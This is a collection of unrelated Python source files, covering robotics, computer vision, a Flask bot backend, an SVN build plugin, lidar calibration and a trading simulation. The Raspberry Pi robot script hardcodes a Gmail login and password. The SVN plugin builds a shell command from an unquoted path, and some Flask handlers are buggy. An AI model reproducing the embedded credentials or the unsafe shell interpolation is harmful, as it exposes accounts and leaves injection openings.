thread.start_new_thread(bot.init_bot, tuple())
@app.route('/')
def index():
return 'Placeholder text'
PAIR_ID = 'id'
DISCORD_ID = 'discord_id'
DISCORD_NAME = 'discord_name'
@app.route('/pair', methods=['POST'])
def handle_pair():
pair_id = request.form[PAIR_ID]
user_id = database.get_user_id_from_pair_id(pair_id)
if user_id is not None:
database.delete_pair_id(pair_id)
user_data = database.get_user_data(user_id)
session[DISCORD_ID] = user_id
session[DISCORD_NAME] = user_data.user_name
else:
abort(401, description="Invalid or expired pair code")
@app.route('/logout', methods=['POST'])
def handle_logout():
session.pop(DISCORD_NAME, None)
session.pop(DISCORD_ID, None)
return redirect(url_for('index'))
@app.route('/data', methods=['POST'])
def handle_data():
speed = request.form['speed']
user_id = session[DISCORD_ID]
user_data = database.get_user_data(user_id)
if user_data:
min_speed = user_data.min_speed
if not min_speed:
database.store_settings_data(user_id, min_speed=0)
if speed < min_speed:
bot.client.punish(user_data)
@app.route('/settings', methods=['GET', 'POST'])
def handle_settings():
method = request.method
if method == 'GET':
pass
elif method == 'POST':
min_speed = request.form['min_speed']
database.store_settings_data(min_speed=min_speed)
|
# Generated by Django 3.0.14 on 2021-08-18 12:43
from django.db import migrations
from bpp.migration_util import load_custom_sql
class Migration(migrations.Migration):
dependencies = [
("bpp", "0287_trgrm_extnsn"),
]
operations = [
migrations.RunPython(
lambda *args, **kw: load_custom_sql("0288_rekord_mat_isbn", app_name="bpp"),
),
# Odbudowanie tabeli rekord_mat spowoduje skasowanie bpp_uczelnia_ewaluacja_view,
# stąd potrzeba zaciągnąć ten plik z poprzednich migracji:
migrations.RunPython(
lambda *args, **kw: load_custom_sql("0207_uczelnia_analiza_view")
),
]
|
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import cv2
import zipfile
from io import StringIO
from PIL import Image
from skimage import img_as_float, img_as_ubyte
# Ignore warnings
import warnings
from data_loaders import *
import os
import os.path
warnings.filterwarnings("ignore")
plt.ion() # interactive mode
class ConcatDataset(Dataset):
"""Concat Demosaic dataset."""
def __init__(self, root_dir, transform=None, pattern='bayer_rggb',
apply_bilinear=False, selection_pattern='', dataset='',num_files=None):
"""
Args:
root_dir (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
selection_file (string) : values are either test or train
"""
if selection_pattern not in ['train', 'test', 'val']:
raise AssertionError
self.root_dir = root_dir
self.transform = transform
self.selection_pattern = selection_pattern
directory = self.root_dir + selection_pattern + '/'
filelist_ = []
for dirpath, dirnames, filenames in os.walk(directory):
for filename in [f for f in filenames if f.endswith(".png")]:
filelist_.append(os.path.join(dirpath, filename))
self.listfiles_gt = filelist_
# keep files according to selection_file
if dataset == 'vdp' or dataset == 'moire':
self.listfiles_gt = [f for f in filelist_ if dataset in f]
self.listfiles_gt.sort()
if selection_pattern == 'train' and num_files is not None:
import random
self.listfiles_gt = random.sample(self.listfiles_gt, num_files)
print(len(self.listfiles_gt))
self.mask = None
self.pattern = pattern
self.apply_bilinear = apply_bilinear
def __len__(self):
return len(self.listfiles_gt)
def compute_mask(self, pattern, im_shape):
"""
Function compute_mask create a mask accordying to patter. The purpose
of mask is to transform 2D image to 3D RGB.
"""
# code from https://github.com/VLOGroup/joint-demosaicing-denoising-sem
if pattern == 'bayer_rggb':
r_mask = np.zeros(im_shape)
r_mask[0::2, 0::2] = 1
g_mask = np.zeros(im_shape)
g_mask[::2, 1::2] = 1
g_mask[1::2, ::2] = 1
b_mask = np.zeros(im_shape)
b_mask[1::2, 1::2] = 1
mask = np.zeros(im_shape +(3,))
mask[:, :, 0] = r_mask
mask[:, :, 1] = g_mask
mask[:, :, 2] = b_mask
elif pattern == 'xtrans':
g_mask = np.zeros((6,6))
g_mask[0,0] = 1
g_mask[0,2] = 1
g_mask[0,3] = 1
g_mask[0,5] = 1
g_mask[1,1] = 1
g_mask[1,4] = 1
g_mask[2,0] = 1
g_mask[2,2] = 1
g_mask[2,3] = 1
g_mask[2,5] = 1
g_mask[3,0] = 1
g_mask[3,2] = 1
g_mask[3,3] = 1
g_mask[3,5] = 1
g_mask[4,1] = 1
g_mask[4,4] = 1
g_mask[5,0] = 1
g_mask[5,2] = 1
g_mask[5,3] = 1
g_mask[5,5] = 1
r_mask = np.zeros((6,6))
r_mask[0,4] = 1
r_mask[1,0] = 1
r_mask[1,2] = 1
r_mask[2,4] = 1
r_mask[3,1] = 1
r_mask[4,3] = 1
r_mask[4,5] = 1
r_mask[5,1] = 1
b_mask = np.zeros((6,6))
b_mask[0,1] = 1
b_mask[1,3] = 1
b_mask[1,5] = 1
b_mask[2,1] = 1
b_mask[3,4] = 1
b_mask[4,0] = 1
b_mask[4,2] = 1
b_mask[5,4] = 1
mask = np.dstack((r_mask,g_mask,b_mask))
h, w = im_shape
nh = np.ceil(h*1.0/6)
nw = np.ceil(w*1.0/6)
mask = np.tile(mask,(int(nh), int(nw),1))
mask = mask[:h, :w,:]
else:
raise NotImplementedError('Only bayer_rggb is implemented')
return mask
def preprocess(self, pattern, img):
"""
bilinear interpolation for bayer_rggb images
"""
# code from https://github.com/VLOGroup/joint-demosaicing-denoising-sem
if pattern == 'bayer_rggb':
convertedImage = cv2.cvtColor(img, cv2.COLOR_BAYER_BG2RGB_EA)
return convertedImage
else:
raise NotImplementedError('Preprocessing is implemented only for bayer_rggb')
def __getitem__(self, idx):
img_name_gt = self.listfiles_gt[idx]
try:
image_gt = cv2.imread(img_name_gt)
b, g, r = cv2.split(image_gt) # get b,g,r
image_gt = cv2.merge([r, g, b]) # switch it to rgb
except Exception as e:
print(e, img_name_gt)
image_gt = cv2.imread(self.listfiles_gt[0])
b, g, r = cv2.split(image_gt) # get b,g,r
image_gt = cv2.merge([r, g, b]) # switch it to rgb
#image_gt = image_gt / 255
#mask = image_gt >= 0.04045
#image_gt[mask] = ((image_gt[mask] + 0.055) / 1.055)**2.4
#image_gt[~mask] = image_gt[~mask] / 12.92
#image_gt = image_gt.clip(0,1)
#image_gt *= 255
#image_gt = image_gt.astype(np.uint8)
# perform mask computation based on size
mask = self.compute_mask(self.pattern, image_gt.shape[:2])
mask = mask.astype(np.uint8)
image_mosaic = np.zeros_like(image_gt)
image_mosaic = mask * image_gt
image_input = np.sum(image_mosaic, axis=2, dtype='uint8')
# perform bilinear interpolation for bayer_rggb images
if self.apply_bilinear:
image_mosaic = self.preprocess(self.pattern, image_input)
image_gt = img_as_ubyte(image_gt)
image_input = img_as_ubyte(image_mosaic)
#assert image_gt.dtype == 'float64'
#assert image_input.dtype == 'float64'
sample = {'image_gt': image_gt,
'image_input': image_input,
'filename': self.listfiles_gt[idx],
'mask': mask}
if self.transform:
sample = self.transform(sample)
return sample
if __name__ == "__main__":
demosaic_dataset = VDPDataset(root_dir='data/mit-demosaicing/joined.zip',
selection_pattern='train',
apply_bilinear=True)
fig, axarr = plt.subplots(3, 4)
for i in range(len(demosaic_dataset)):
sample = demosaic_dataset[i]
ax = axarr[0, i]
ax.set_title('Sample groundtruth #{}'.format(i))
ax.axis('off')
ax.imshow(sample['image_gt'], interpolation="none")
ax = axarr[1, i]
ax.set_title('Sample input #{}'.format(i))
ax.axis('off')
ax.imshow(sample['image_input'], cmap='gray')
ax = axarr[2, i]
ax.set_title('Sample mosaic #{}'.format(i))
ax.axis('off')
ax.imshow(sample['image_mosaic'], interpolation="none")
if i == 3:
# Fine-tune figure; make subplots farther from each other.
plt.show()
break
# plot some transformations for demonstration
composed = [RandomCrop(100), [Identity(), RandomRotation(), Onepixelshift(x=0, y=10)],
ToTensor()]
demosaic_dataset_ = ConcatDataset(root_dir='data/mit-demosaicing/joined.zip',
selection_pattern='train',
transform=composed,
apply_bilinear=True)
dataloader_val = DataLoader(demosaic_dataset_, batch_size=20,
shuffle=False, num_workers=4)
# Apply each of the above transforms on sample.
fig, axarr = plt.subplots(3, 5)
for i in range(len(demosaic_dataset_)):
sample = demosaic_dataset_[i]
ax = axarr[0, i]
ax.imshow(swapimdims_3HW_HW3(sample['image_gt']))
ax = axarr[1, i]
ax.imshow(sample['image_input'], cmap='gray')
ax = axarr[2, i]
ax.imshow(swapimdims_3HW_HW3(sample['image_mosaic']))
if i == 5:
plt.show()
break
|
#!/usr/bin/env python3
'''This NetworkTables client listens for changes in NetworkTables values.'''
import time
from networktables import NetworkTables
import logging
# To see messages from networktables, you must setup logging
logging.basicConfig(level=logging.DEBUG)
def valueChanged(table, key, value, isNew):
print("{}; key: {}; value: {}; isNew: {}".format(table, key, value, isNew))
NetworkTables.initialize(server='192.168.1.21')
sd = NetworkTables.getTable("SmartDashboard")
sd.addEntryListener(valueChanged)
while True:
time.sleep(1)
|
import numpy as np
import cv2 # OpenCV-Python
import matplotlib.pyplot as plt
import imutils
import time
import RPi.GPIO as gpio
import os
from datetime import datetime
import smtplib
from smtplib import SMTP
from smtplib import SMTPException
import email
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
import serial
ser = serial.Serial('/dev/ttyUSB0',9600)
imu_data = []
#email
def email_Send():
pic_time = datetime.now().strftime('%Y%m%d%H%M%S')
# command = 'raspistill -w 1280 -h 720 -vf -hf -o ' + pic_time + '.jpg'
# os.system(command)
#EMAIL
smtpUser = 'enpm809tslamdunk@gmail.com'
smtpPass = 'pi@slamdunk'
#DESTINATION
toAdd = 'govindajithkumar97@gmail.com'
fromAdd = smtpUser
subject = 'IMAGE RECORDED FROM PI' + pic_time
msg = MIMEMultipart()
msg['Subject'] = subject
msg['From'] = fromAdd
msg['To'] = toAdd
msg.preamble = "IMage recorded at : " + pic_time
#EMAIL TEXT
body = MIMEText("Image recorded at : " + pic_time)
msg.attach(body)
fp = open('email_image_captured'+'.png','rb')
img = MIMEImage(fp.read())
fp.close()
msg.attach(img)
#send email
s = smtplib.SMTP('smtp.gmail.com',587)
s.ehlo()
s.starttls()
s.ehlo()
s.login(smtpUser,smtpPass)
s.sendmail(fromAdd, toAdd, msg.as_string())
s.quit()
print("Email DELIVERED!!!!!")
gpio.setmode(gpio.BOARD)
def init():
gpio.setup(31,gpio.OUT) #IN1
gpio.setup(33,gpio.OUT) #IN2
gpio.setup(35,gpio.OUT) #IN3
gpio.setup(37,gpio.OUT) #IN4
def gameover():
gpio.output(31,False)
gpio.output(33,False)
gpio.output(35,False)
gpio.output(37,False)
init()
pin1 = 33
pin2 = 37
pwm1 = gpio.PWM(pin1,50)
pwm2 = gpio.PWM(pin2,50)
pin3 = 31
pin4 = 35
pwm3 = gpio.PWM(pin3,50)
pwm4 = gpio.PWM(pin4,50)
val = 60
val_f = 70
#servo
gpio.setup(36,gpio.OUT)
pwm = gpio.PWM(36,50)
#####
def forward(val_f):
pwm3.start(val_f)
pwm2.start(val_f)
time.sleep(0.1)
def reverse(val_f):
pwm1.start(val_f)
pwm4.start(val_f)
time.sleep(0.1)
def left(val):
pwm1.start(val)
pwm2.start(val)
time.sleep(0.1)
def right(val):
pwm3.start(val)
pwm4.start(val)
time.sleep(0.1)
def stop():
pwm1.stop()
pwm2.stop()
pwm3.stop()
pwm4.stop()
time.sleep(0.1)
pwm.start(8.3)
def servo_open():
time.sleep(0.1)
i = 0
for i in range(5):
pwm.ChangeDutyCycle(12.0)
time.sleep(0.1)
# pwm.stop()
def servo_close():
# pwm.start(8.3)
time.sleep(0.1)
i = 0
for i in range(5):
pwm.ChangeDutyCycle(6.5)
time.sleep(1)
# pwm.stop()
trig = 16
echo = 18
def Ultrasonic_distance():
gpio.setmode(gpio.BOARD)
gpio.setup(trig,gpio.OUT)
gpio.setup(echo,gpio.IN)
#ensure that the output has no value
gpio.output(trig,False)
time.sleep(0.010)
#generate the trigger pulse
gpio.output(trig,True)
time.sleep(0.00001) #this is 10 microseconds
gpio.output(trig,False)
all_distance=[]
#generating the return / echo signals
try:
while gpio.input(echo)==0:
pulse_start=time.time()
while gpio.input(echo) == 1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
#convert time to distance
distance = pulse_duration*17150
distance = round(distance,2)
except:
distance = 999 #arbitary high value > 9, because of the ultrasonic threshold mentioned below.
return(distance)
cam= cv2.VideoCapture(0)
count=0
def calc_dist(pt1):
pt2 = (320,240)
dist = 320-pt1[0]
return dist
def draw(orig_image):
cv2.line(orig_image,(320,0),(320,480),(255,255,255),1)
cv2.line(orig_image,(0,240),(640,240),(255,255,255),1)
cv2.circle(orig_image,(centre_x,centre_y),100,(0,255,0),2)
cv2.circle(orig_image,(centre_x,centre_y),4,(255,255,255),-1)
flag = False #for opening
flag2 = False # for closing
while True:
line = ser.readline()
line = line.rstrip().lstrip()
line = str(line)
line = line.strip("'")
line = line.strip("b'")
imu_data.append(line)
print("imu=",line)
dist_US = Ultrasonic_distance()
if dist_US>9 and flag == False:
print('SERVO OPENING')
servo_open()
time.sleep(0.8)
flag = True
flag2 = False
ret, image=cam.read()
image = cv2.flip(image,-1)
orig_image = image
hsv_img = cv2.cvtColor(image,cv2.COLOR_BGR2HSV)
lower_range = np.array([0,105,175])
upper_range = np.array([180,255,255])
mask = cv2.inRange(hsv_img, lower_range, upper_range)
edged = cv2.Canny(mask, 30, 200)
try:
_,contours,_= cv2.findContours(edged,cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
contours_poly = [None]*len(contours)
centers = [None]*len(contours)
radius = [None]*len(contours)
cx= []
cy = []
for i, c in enumerate(contours):
contours_poly[i] = cv2.approxPolyDP(c, 3, True)
centers[i], radius[i] = cv2.minEnclosingCircle(contours_poly[i])
cx.append(centers[i][0])
cy.append(centers[i][1])
centre_x= int((min(cx)+max(cx))/2)
centre_y = int((min(cy)+max(cy))/2)
dist_2 = calc_dist((centre_x,centre_y))
print('------- horizontal distance ------ ' , dist_2)
cv2.putText(orig_image,'Ultrasonic : '+str(dist_US),(10,440),cv2.FONT_HERSHEY_COMPLEX,1,(255,0,255),2,cv2.LINE_AA)
draw(orig_image)
cv2.putText(orig_image,'Centre point offset : ' + str(dist_2),(10,410),cv2.FONT_HERSHEY_COMPLEX,1,(255,255,0),2,cv2.LINE_AA)
if(dist_2<-50):
print(' turning right ONLY')
right(val)
elif(dist_2>50):
print(' turning left ONLY')
left(val)
elif(-50<=dist_2<=50):
dist_US = Ultrasonic_distance()
print( ' dist_US WHILE MOVING STRAIGHT >>>>>>>> ' , dist_US)
if dist_US>9:
forward(val_f)
stop()
if dist_US<=9and flag2 == False:
print('SERVO CLOSING')
cv2.putText(orig_image,'Email sent regarding object pickup to Dr. M',(10,30),cv2.FONT_HERSHEY_COMPLEX,0.6,(255,255,255),2,cv2.LINE_AA)
cv2.imwrite ('email_image_captured.png',orig_image)
print('writing image ' )
#time.sleep(0.5)
email_Send()
servo_close()
time.sleep(1.5)
# time.sleep(3)
print('CLOSING COMPLETE')
flag2 = True
print('reversing now')
reverse(val_f)
time.sleep(3.5)
stop()
print('servo opening again')
servo_open()
time.sleep(0.8)
reverse(val_f)
time.sleep(1)
left(val)
time.sleep(2)
forward(val_f)
time.sleep(1)
except:
stop()
print('ERROR OCCURED')
pass
cv2.imshow("contour image",orig_image)
# cv2.imshow("mask",mask)
cv2.imwrite (str(count+100)+'.png',orig_image)
# out.write(orig_image)
count+=1
k = cv2.waitKey(100) & 0xFF
if k == 27:
break
file = open('assignment_9_imu_values.txt','w')
for i in imu_data:
file.write(str(i))
file.write('\n')
file.close()
gameover()
gpio.cleanup()
cam.release()
# out.release()
cv2.destroyAllWindows()
|
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0 + Commons Clause
# -------------------------------------------------------------------------
# svn.py - this code contains support for the old-and-busted Subversion
# version control system, for those that are not yet using git, which
# is the new hotness. It currently assumes repos are publically accessible
# and because SVN doesn't really have "real" branches, ignores the
# branch parameter. Upgrades from users of SVN setups are quite welcome as
# are additions of other SCM types.
# --------------------------------------------------------------------------
import shlex
from vespene.common.logger import Logger
from vespene.workers import commands
LOG = Logger()
class Plugin(object):
def __init__(self):
pass
def setup(self, build):
self.build = build
self.project = build.project
self.repo = build.project.repo_url
def info_extract(self, attribute):
cmd = "(cd %s; svn info | grep \"%s\")" % (self.build.working_dir, attribute)
out = commands.execute_command(self.build, cmd, output_log=False, message_log=True)
if ":" in out:
return out.split(":")[-1].strip()
return None
def get_revision(self):
return self.info_extract("Last Changed Rev:")
def get_last_commit_user(self):
return self.info_extract("Last Changed Author:")
def checkout(self):
self.build.append_message("----------\nCloning repository...")
cmd = "svn checkout --non-interactive --quiet %s %s" % (shlex.quote(self.repo), self.build.working_dir)
return commands.execute_command(self.build, cmd, output_log=False, message_log=True)
|
from .megadepth import MegaDepth_SIFT, MegaDepth_superpoint, MegaDepth_Depth
from .hpatches import HPatch_SIFT
from .aachen import Aachen_Day_Night
from .ETH_local_feature import ETH_LFB
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import rospy
import tf
import tf2_ros
import sensor_msgs.point_cloud2 as pc2
import pcl # https://github.com/strawlab/python-pcl/
import sys
import yaml
import os
from sensor_msgs.msg import PointCloud2
def translation_as_list(t):
return [t.x, t.y, t.z]
def quaternion_as_list(q):
return [q.x, q.y, q.z, q.w]
def transform_and_convert_to_pcl(pc2_cloud, transform):
trans = translation_as_list(transform.translation)
quat = quaternion_as_list(transform.rotation)
A = tf.transformations.translation_matrix(trans).dot(tf.transformations.quaternion_matrix(quat))
raw_points_list = [A.dot((p[0], p[1], p[2], 1.0))[:3] for p in pc2.read_points(pc2_cloud, field_names=("x", "y", "z"), skip_nans=True)]
points_list = [p for p in raw_points_list if (1 < p[2] < 4 and
2.5 < np.hypot(p[0], p[1]) < 20 and
np.abs(np.arctan2(p[1], p[0])) < np.pi/4)]
pcl_data = pcl.PointCloud()
pcl_data.from_list(points_list)
return pcl_data
def apply_delta_to_transform(D, transform):
trans = translation_as_list(transform.translation)
quat = quaternion_as_list(transform.rotation)
A = tf.transformations.translation_matrix(trans).dot(tf.transformations.quaternion_matrix(quat))
B = D.dot(A)
return (tf.transformations.translation_from_matrix(B),
tf.transformations.quaternion_from_matrix(B))
def plot_pcl(cloud, dims=(0,1), label=None):
plt.scatter([p[dims[0]] for p in cloud.to_list()],
[p[dims[1]] for p in cloud.to_list()],
s=.1, label=label)
class MultiVelodyneRegistration:
def __init__(self, output_filename):
rospy.init_node("multi_velodyne_registration", anonymous=True)
self.output_filename = output_filename
self.tfBuffer = tf2_ros.Buffer()
self.tfListener = tf2_ros.TransformListener(self.tfBuffer)
self.M_HDL32_PC2 = None
self.FL_VLP16_PC2 = None
self.FR_VLP16_PC2 = None
self.M_HDL32_tf0 = None
self.FL_VLP16_tf0 = None
self.FR_VLP16_tf0 = None
rospy.Subscriber("/M_HDL32/velodyne_points", PointCloud2, self.M_HDL32_cb, queue_size=1)
rospy.Subscriber("/FL_VLP16/velodyne_points", PointCloud2, self.FL_VLP16_cb, queue_size=1)
rospy.Subscriber("/FR_VLP16/velodyne_points", PointCloud2, self.FR_VLP16_cb, queue_size=1)
def M_HDL32_cb(self, msg):
if self.M_HDL32_PC2 is None:
self.M_HDL32_PC2 = msg
def FL_VLP16_cb(self, msg):
if self.FL_VLP16_PC2 is None:
self.FL_VLP16_PC2 = msg
def FR_VLP16_cb(self, msg):
if self.FR_VLP16_PC2 is None:
self.FR_VLP16_PC2 = msg
def run(self):
rate = rospy.Rate(10)
while (self.M_HDL32_PC2 is None or self.FL_VLP16_PC2 is None or self.FR_VLP16_PC2 is None or
self.M_HDL32_tf0 is None or self.FL_VLP16_tf0 is None or self.FR_VLP16_tf0 is None):
try:
self.M_HDL32_tf0 = self.tfBuffer.lookup_transform("vehicle_base",
"M_velodyne",
rospy.Time(0))
self.FL_VLP16_tf0 = self.tfBuffer.lookup_transform("vehicle_base",
"FL_velodyne_rough",
rospy.Time(0))
self.FR_VLP16_tf0 = self.tfBuffer.lookup_transform("vehicle_base",
"FR_velodyne_rough",
rospy.Time(0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
pass
rate.sleep()
M_HDL32_PCL = transform_and_convert_to_pcl(self.M_HDL32_PC2,
self.M_HDL32_tf0.transform)
# [0.000, 0.000, 1.470],
# [0.000, 0.000, -0.707, 0.707])
FL_VLP16_PCL = transform_and_convert_to_pcl(self.FL_VLP16_PC2,
self.FL_VLP16_tf0.transform)
# [2.130, 1.020, 0.660],
# [0.000, 0.000, 0.000, 1.000])
FR_VLP16_PCL = transform_and_convert_to_pcl(self.FR_VLP16_PC2,
self.FR_VLP16_tf0.transform)
# [2.130, -1.020, 0.660],
# [0.000, 0.000, 0.000, 1.000])
ICP = pcl.IterativeClosestPoint()
FL_conv, FL_delta_transform, FL_aligned, FL_fitness = ICP.icp(FL_VLP16_PCL,
M_HDL32_PCL)
ICP = pcl.IterativeClosestPoint()
FR_conv, FR_delta_transform, FR_aligned, FR_fitness = ICP.icp(FR_VLP16_PCL,
M_HDL32_PCL)
FL_VLP16_tf = apply_delta_to_transform(FL_delta_transform, self.FL_VLP16_tf0.transform)
FR_VLP16_tf = apply_delta_to_transform(FR_delta_transform, self.FR_VLP16_tf0.transform)
FL_VLP16_args = (" ".join(map(str, FL_VLP16_tf[0])) + " " +
" ".join(map(str, FL_VLP16_tf[1])) + " " +
"vehicle_base FL_velodyne 100")
FR_VLP16_args = (" ".join(map(str, FR_VLP16_tf[0])) + " " +
" ".join(map(str, FR_VLP16_tf[1])) + " " +
"vehicle_base FR_velodyne 100")
calibration_dict = dict(FL_VLP16_args=FL_VLP16_args, FR_VLP16_args=FR_VLP16_args)
with open(self.output_filename, 'w') as f:
yaml.dump(calibration_dict, f)
plt.figure()
plot_pcl(M_HDL32_PCL, label="M_HDL32")
plot_pcl(FL_VLP16_PCL, label="FL_VLP16")
plot_pcl(FR_VLP16_PCL, label="FR_VLP16")
plt.title("uncalibrated")
plt.axis("equal")
leg = plt.legend()
leg.legendHandles[0]._sizes = [30]
leg.legendHandles[1]._sizes = [30]
leg.legendHandles[2]._sizes = [30]
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
plt.figure()
plot_pcl(M_HDL32_PCL, label="M_HDL32")
plot_pcl(FL_aligned, label="FL_VLP16")
plot_pcl(FR_aligned, label="FR_VLP16")
plt.title("calibrated")
plt.axis("equal")
leg = plt.legend()
leg.legendHandles[0]._sizes = [30]
leg.legendHandles[1]._sizes = [30]
leg.legendHandles[2]._sizes = [30]
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
plt.show()
if __name__ == '__main__':
output_filename = sys.argv[1] if len(sys.argv) > 1 else os.path.join(os.path.dirname(__file__), "multi_velodyne_calibration.yaml")
mvr = MultiVelodyneRegistration(output_filename)
mvr.run()
|
from .voivodeships import VOIVODESHIPS
from .api_codes import API_CODES
from .bir_version_maps import *
from .dev_environment import API_KEY_TEST_ENV
from .dev_environment import WARNINGS as DEV_ENV_WARNINGS
|
# Simulation under multi-agent and ask/bid setting with inventory
import copy
import numpy as np
import pickle
np.random.seed(12345)
class bcolors:
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
PINK = '\033[35m'
GREY = '\033[36m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
lr = 100000
# Use 2000000 for Fig. 2 and 3
n_periods = 2000000
eps = 1e-5
DELTA = 0.0
n_agents = 2
tick_num = 2
sig = 0.1
# Set to 0.0 for Fig.3
inven_factor = 0.0
temper = 0.1
# Comment out to replicate ask/bid spreads case in Fig.2 and 3
weights = np.zeros(tick_num)
space = np.zeros(tick_num)
space[0] = 0.1
space[1] = 0.8
# space = np.linspace(0.1, 0.5, tick_num)
# weights = np.linspace(0.0, 0.1, tick_num)
n_instance = 10
def reward_cal(action):
# Compute profits for all agents
reward = np.zeros(n_agents)
action = action.astype(int)
price = space[action]
# Only the lowest bid gets the order
kernel = np.sum(weights[action])
kernel = kernel / sig / n_agents
arrival_prob = np.exp(-kernel)
if np.random.binomial(1, arrival_prob, 1)[0]:
winner = np.where(price == price.min())
reward[winner] = price.min() / len(winner[0])
else:
winner = -1
return winner, reward
def boltz_select(agent, Q):
prob = np.exp(Q[agent] / temper)
prob = prob / np.sum(prob)
return np.random.choice(tick_num ** 2, 1, p=prob)
# Q_hist = np.zeros((n_instance, n_periods+1, n_agents, tick_num ** 2))
Q_hist = []
Q_last = np.zeros((n_instance, n_agents, tick_num ** 2))
# inventory_hist = np.zeros((n_instance, n_periods+1, n_agents))
inventory_hist = []
for sess in range(n_instance):
steps_done = 0
# Counter for variations in heat
count = 0
inventory = np.zeros(n_agents)
Q = np.zeros((n_agents, tick_num ** 2))
epiQ_hist = []
epiI_hist = []
for i_episode in range(n_periods + 1):
# For each agent, select and perform an action
action = np.zeros(n_agents, dtype=int)
for i in range(n_agents):
if inventory[i] > 100:
action[i] = 1
elif inventory[i] < -100:
action[i] = 2
else:
action[i] = boltz_select(i, Q)
ask_action = (action // tick_num).astype(int)
bid_action = (action % tick_num).astype(int)
steps_done += 1
old_inventory = copy.deepcopy(inventory)
bid_winner, bid_reward = reward_cal(bid_action)
ask_winner, ask_reward = reward_cal(ask_action)
if bid_winner != -1:
inventory[bid_winner] += 1 / len(bid_winner[0])
if ask_winner != -1:
inventory[ask_winner] -= 1 / len(ask_winner[0])
inventory_change = inventory - old_inventory
# Inventory risk
reward_total = bid_reward + ask_reward - inven_factor * inventory_change**2
old_heat = Q.argmax(1)
if i_episode%10000 == 0:
epiQ_hist.append(copy.deepcopy(Q))
epiI_hist.append(copy.deepcopy(inventory))
alpha = lr/(lr + steps_done)
for i in range(n_agents):
Q[i, action[i]] = (1 - alpha)*Q[i, action[i]] + alpha*(reward_total[i] + DELTA*Q[i].max())
new_heat = Q.argmax(1)
if np.sum(np.abs(old_heat - new_heat)) == 0:
count += 1
else:
count = 0
if i_episode % 100000 == 0:
print(bcolors.GREEN + 'Session', sess, 'Step:', steps_done, bcolors.ENDC)
print('Greedy policy', Q.argmax(1))
print('Q', Q)
print('Bid', space[bid_action], 'Ask', space[ask_action])
print('Inventory', inventory, 'Count', count)
if count == 1000000:
print(bcolors.RED + 'Terminate condition satisfied.' + bcolors.ENDC)
print('Q', Q)
# break
Q_last[sess, :, :] = Q
Q_hist.append(epiQ_hist)
inventory_hist.append(epiI_hist)
Q_mean = Q_last.mean(axis=(0, 1))
prob = np.exp(Q_mean / temper)
prob = prob / prob.sum()
print('Mean values of Q', Q_mean)
print('Variance of Q', Q_last.var(0))
print('Probability of actions', prob)
# For Fig.2
# with open('Q_stag.pickle', 'wb') as fp:
# pickle.dump(np.array(Q_hist), fp)
#
# with open('inven_stag.pickle', 'wb') as fp:
# pickle.dump(np.array(inventory_hist), fp)
# For Fig. 3
with open('Q_hard.pickle', 'wb') as fp:
pickle.dump(np.array(Q_hist), fp)
with open('inven_hard.pickle', 'wb') as fp:
pickle.dump(np.array(inventory_hist), fp)
# For Fig. 7
# with open('Q_AB.pickle', 'wb') as fp:
# pickle.dump(np.array(Q_hist), fp)
#
# with open('inven_AB.pickle', 'wb') as fp:
# pickle.dump(np.array(inventory_hist), fp)
|
# Copyright 2016 by Raytheon BBN Technologies Corp. All Rights Reserved.
import unittest
# Test functions in multi.py
from .helpers import testable_sequence, discard_zero_Ids, \
channel_setup, assertPulseSequenceEqual
from pyqgl2.main import compile_function
from QGL import *
class TestMulti(unittest.TestCase):
def setUp(self):
channel_setup()
def tearDown(self):
pass
def test_multiQbitTest2(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
expected = [
Id(q1),
Id(q2),
X(q1),
X(q2),
Barrier(q1, q2),
MEAS(q1),
MEAS(q2)
]
resFunction = compile_function("test/code/multi.py",
"multiQbitTest2")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
def test_doSimple(self):
q2 = QubitFactory('q2')
expected = [
X(q2),
MEAS(q2)
]
resFunction = compile_function("test/code/multi.py",
"doSimple")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
def test_anotherMulti(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
expected = [
Id(q1),
Id(q2),
X(q1),
X(q2),
Barrier(q1, q2),
MEAS(q1),
MEAS(q2),
Y(q1),
Y(q2)
]
resFunction = compile_function("test/code/multi.py",
"anotherMulti")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
def test_anotherMulti2(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
q3 = QubitFactory('q3')
#q1: Id, X, MEAS, <barrier>, Y, <barrier>
# q2: Id, X, MEAS, <barrier> ?Id?
# q3: <barrier>, Y, <barrier>
expected = [
Id(q1),
Id(q2),
X(q1),
X(q2),
Barrier(q1, q2, q3),
MEAS(q1),
MEAS(q2),
Barrier(q1, q2, q3),
Y(q1),
Y(q3)
]
resFunction = compile_function("test/code/multi.py",
"anotherMulti2")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
resFunction = compile_function("test/code/multi.py",
"anotherMulti3")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
|
# from https://github.com/deepmind/open_spiel
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import scipy.linalg as la
from open_spiel.python.egt import utils
from open_spiel.python.egt.alpharank import *
import matplotlib.patches as patches
import matplotlib
matplotlib.rcParams.update({'font.family': 'serif'})
import matplotlib.pyplot as plt
from rlkit.util.alpharank_visualizer import plot_pi_vs_alpha, NetworkPlot
def sweep_pi_vs_alpha(payoff_tables,
strat_labels=None,
warm_start_alpha=None,
m=50,
rtol=1e-5,
